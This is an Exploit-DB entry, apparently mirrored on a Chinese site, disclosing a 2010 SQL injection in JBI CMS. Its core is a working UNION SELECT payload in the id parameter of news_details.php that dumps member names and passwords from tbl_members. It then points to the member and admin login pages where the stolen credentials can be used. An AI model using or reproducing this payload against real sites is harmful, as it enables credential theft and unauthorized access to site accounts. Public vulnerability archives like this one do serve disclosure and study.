JBI CMS – SQL Injection

  • 作者: Cru3l.b0y
    日期: 2010-11-04
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15416/
  • In The Name Of GOD
    [+] Exploit Title: JBI CMS SQL Injection Vulnerability
    [+] Date: 2010-11-04
    [+] Author: Cru3l.b0y
    [+] Software Link: http://www.jamesblakeinternet.com/london/cms
    [+] Tested on: Ubuntu 10.10
    [+] Contact : Cru3l.b0y@gmail.com
    [+] Website : WwW.PenTesters.IR
    [+] Greeting: Behzad, Ahmad, ...
    
    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    [+] Exploit : 
    
     http://target/path/news_details.php?id=-1+union+select+1,2,3,group_concat(name,0x3a,password),5,6,7+from+tbl_members
    			
    Login page for members : /member.php
    Login page for Admins: /admin